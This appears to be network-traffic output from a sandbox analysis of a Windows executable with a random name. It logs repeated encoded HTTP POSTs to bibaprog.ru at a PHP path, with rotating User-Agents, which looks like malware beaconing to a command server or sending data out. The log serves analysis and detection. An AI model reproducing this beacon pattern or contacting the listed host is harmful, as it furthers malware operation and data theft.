Jan 13, 2025 13:37:33.032058001 CET	1015	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:37:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a23IktWnlu2tWtgHtkKgFX1IL80EvtYftf9uzgV4rW24X2Rwb8J1pqmRQ8whQbujtrA2lrDxRbDNHLmcmRLN%2BWUb7BWmIrn%2Bb3HH65GvS%2B8VAW7wQ%2BwiZiNRElkedw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015702fb9108ca1-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4288&min_rtt=1970&rtt_var=5376&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=71146&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49872	104.21.64.1	80	5340	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:37:44.318007946 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:37:44.662259102 CET	344	OUT	Data Raw: 00 01 04 03 03 0b 01 05 05 06 02 01 02 06 01 02 00 06 05 09 02 03 03 00 01 06 0e 0d 03 03 00 07 0d 51 06 5b 03 54 06 06 0b 0a 07 06 04 04 02 02 06 01 0c 5b 0a 02 05 01 07 00 07 06 05 01 05 0f 00 01 0d 01 07 51 06 04 0f 0e 0c 07 0f 51 0d 07 06 54 Data Ascii: Q[T[QQTQV\L}T\|`q\wLSwvlhBv\c\|x]RlRxZxjK}moPtYZAu~V@BxmbN~LW
Jan 13, 2025 13:37:44.766022921 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:37:44.993552923 CET	1017	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:37:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJ%2FCVGNmpoaoaxr0pQC0jxHidgbekhRyFoCWL91PWn4kO3CPjoYzbM%2FU2EBJth9ATjFJM6JbJ05pj%2F7iNnMhgyPkugBRm2JpMAEql53nXwHdbd9Kzm3GzFHTteWeIQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015707a89bdc358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2913&min_rtt=1681&rtt_var=3095&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=126505&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49919	104.21.64.1	80	5296	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:37:51.942455053 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:37:52.287398100 CET	344	OUT	Data Raw: 00 03 04 04 06 0b 04 01 05 06 02 01 02 0d 01 0b 00 00 05 0a 02 01 03 00 02 04 0f 0d 04 57 02 07 0e 01 03 00 01 01 03 03 0b 05 02 07 06 01 04 04 05 03 0d 0f 0a 07 04 52 06 54 04 0d 05 07 06 08 05 06 0e 0f 06 0f 06 55 0e 01 0c 04 0e 03 0e 08 05 07 Data Ascii: WRTU[RQS\L~N\|jt[}MaeQS~lu`lxhc{[lUol`W^CkP`Yk[}O~V@z}zO~bW
Jan 13, 2025 13:37:52.391191959 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:37:52.622592926 CET	1025	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:37:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxtWvZsvycmc%2F0rFVkRccosdL16ecCqJM1CuIaYf%2BrVMocYf20cD%2F%2BYAY07iD3srtOIhagZ0AArjBssIbWgHZl6OiJhrkDSAx7AsDABSsssVB1b804E%2FN3M1%2F%2Fmqqw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901570aa2db98ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3614&min_rtt=2363&rtt_var=3388&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=118008&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49980	104.21.64.1	80	7060	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:38:04.746824980 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:38:05.099750042 CET	344	OUT	Data Raw: 00 02 04 05 06 0c 04 07 05 06 02 01 02 0c 01 0a 00 07 05 0d 02 00 03 08 00 02 0d 04 07 02 00 01 0d 01 06 5b 01 03 06 00 0d 04 06 06 05 03 02 04 07 02 0c 5d 0d 53 07 52 07 07 07 06 05 05 04 0e 02 07 0f 5c 07 05 06 01 0c 01 0b 01 0f 0d 0b 08 07 0d Data Ascii: []SR\Q\L~pzt\av[xitll`pKy\|QxNvKhm``gxN}_~V@zmf~rq
Jan 13, 2025 13:38:05.199692011 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:38:05.467933893 CET	1024	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:38:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVmKRnzS2Ne105hqKBpaMTQtf3IBZibIRToJPtDT0Xl%2BA89RNCPSY33KLVLMpup%2FfE%2BuNylKcbH8%2BQ0Ikk0ET%2Bp%2BPCqbHqlFQFF4fiZWmuJo4jU6SOgOPetcrClU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901570fa39b07c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3944&min_rtt=2004&rtt_var=4632&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=83290&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49981	104.21.64.1	80	4820	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:38:12.856420994 CET	294	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:38:13.209248066 CET	344	OUT	Data Raw: 00 02 04 00 03 0b 01 03 05 06 02 01 02 01 01 00 00 01 05 0a 02 01 03 0f 02 52 0a 0d 03 04 02 05 0e 0f 05 0c 02 0c 07 05 0b 03 05 03 05 06 05 04 05 05 0c 0a 0c 04 04 56 05 0f 06 07 06 51 00 0d 02 57 0c 01 00 06 07 01 0f 02 0c 0e 0e 01 0e 04 02 06 Data Ascii: RVQW\\L~\|cu_cb[Lv[Z~luOcRZ~c\|K{Bl[l^a^\|noPtgZ}e~V@xC~O~bS
Jan 13, 2025 13:38:13.300182104 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:38:13.531755924 CET	1013	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:38:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XoQCe17d%2FgQqHI26kTCODwJNWZyFRDNoz7te71K4odsXpHYZHXLvfgTZze7YOV3r4fL%2FEdjr4f9aAYc3fHbQA8p6p76sNzg31LfxQgRKsum9%2F9Po6MeizqCdxQdfVw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015712cdcb2de95-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1854&min_rtt=1744&rtt_var=874&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=556190&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49982	104.21.64.1	80	3292	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:38:20.848382950 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:38:21.194999933 CET	344	OUT	Data Raw: 00 04 01 02 03 0d 04 06 05 06 02 01 02 04 01 02 00 0b 05 0b 02 04 03 0b 07 07 0a 0c 06 0f 03 04 0f 00 05 0b 03 54 06 50 0e 0b 05 07 00 03 06 01 06 53 0d 0a 0c 57 01 04 04 07 04 04 07 07 05 0d 05 02 0f 0e 05 02 07 01 0f 04 0e 04 0a 04 0c 54 06 01 Data Ascii: TPSWTYTR\L}Qpq]c[}uflBi`BRLhwYxUs{`vkUtY^~_~V@@xmPL}r}
Jan 13, 2025 13:38:21.312488079 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:38:21.545388937 CET	1022	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:38:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JulNbpO6M6cr2LMAd6WS5v%2BIqLg5U2YBcswd0H9dnuOUPPXkgsUQ0tctPoftPrFVJ5886s%2BR4XQ%2BptM%2BsA%2BwVEwAldu0R4lJzLdEptCPgfgtrWPpIPnwwlZuJwU%2BhA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015715ee94ade95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3520&min_rtt=1628&rtt_var=4394&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=87091&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49983	104.21.64.1	80	1788	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:38:33.190608025 CET	294	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:38:33.537319899 CET	344	OUT	Data Raw: 00 00 04 05 03 0b 04 07 05 06 02 01 02 02 01 0b 00 04 05 0f 02 01 03 01 07 03 0a 0c 03 0e 00 09 0e 02 03 0a 00 0c 07 00 0e 04 05 07 00 05 06 06 03 05 0b 0a 0d 54 01 0a 05 07 06 07 05 06 06 01 00 54 0a 00 07 06 06 56 0f 02 0d 00 0c 00 0e 55 02 0c Data Ascii: TTVUPVR\L~\|`fO`\\^v\hkouLcR{Y~ss_{odXxNjK~\|@tdZ~e~V@z}T~b[
Jan 13, 2025 13:38:33.652694941 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:38:33.882955074 CET	1008	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:38:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NKUYprkkH61xJDUpPBBF6Yqc671ldjVkPYWjS1HbiEVZ3WAJUJhdAkN6Q%2FK3KEYZWM6GJVbEwFCckIjN%2BTtzTnwYaxxTSA9urX2Od30xdkWEbdY3Q%2FsK2dzzzcWxhQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901571ac0f27de95-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3884&min_rtt=1573&rtt_var=5212&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=72770&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Jan 13, 2025 13:38:33.973479986 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.5	49984	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:38:40.480601072 CET	294	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:38:40.834306955 CET	344	OUT	Data Raw: 05 00 01 05 06 01 01 01 05 06 02 01 02 04 01 06 00 03 05 0e 02 03 03 0b 00 01 0a 01 04 53 03 04 0c 03 04 5e 02 51 07 0b 0c 57 05 04 00 04 07 01 06 06 0d 0c 0f 07 04 06 07 57 04 00 06 06 04 0e 00 53 0d 5a 00 07 06 06 0d 0f 0c 0e 0a 07 0c 02 06 0d Data Ascii: S^QWWSZU\L~N`btbyuKUUkoetB^B``{oxZo`fI}ml@twRNj_~V@@{mv~L}
Jan 13, 2025 13:38:40.944037914 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:38:41.169760942 CET	1015	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:38:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4S762jdOnFtxG70urj1FVwLeee6ySKQ6f6m8YZ4SefX%2BTgtdm78g8bAokfY7l5wDj0vu69b4q2plVfsBXV70vm1bcdn6hxlz1icpF32%2F%2FlcKT%2FXXTbI8Ab4G9DyIA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901571d99d427c6a-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=5001&min_rtt=1955&rtt_var=6825&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=55462&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.5	49985	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:38:51.704562902 CET	282	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:38:52.052949905 CET	344	OUT	Data Raw: 00 0a 04 04 06 0b 01 0a 05 06 02 01 02 00 01 05 00 02 05 00 02 05 03 0e 00 55 0f 53 04 00 06 03 0f 05 04 0f 03 06 06 0a 0e 0b 05 07 05 07 07 05 07 04 0c 0e 0f 02 07 01 07 00 03 07 06 51 05 0f 00 53 0e 08 06 03 01 06 0f 07 0f 0f 0c 0d 0d 09 07 50 Data Ascii: USQSPWVRP\L}Skczvb[MwfcQkou`lRk]^J{lwxcvISRtgxje~V@{Sr}bi
Jan 13, 2025 13:38:52.152313948 CET	25	IN	HTTP/1.1 100 Continue
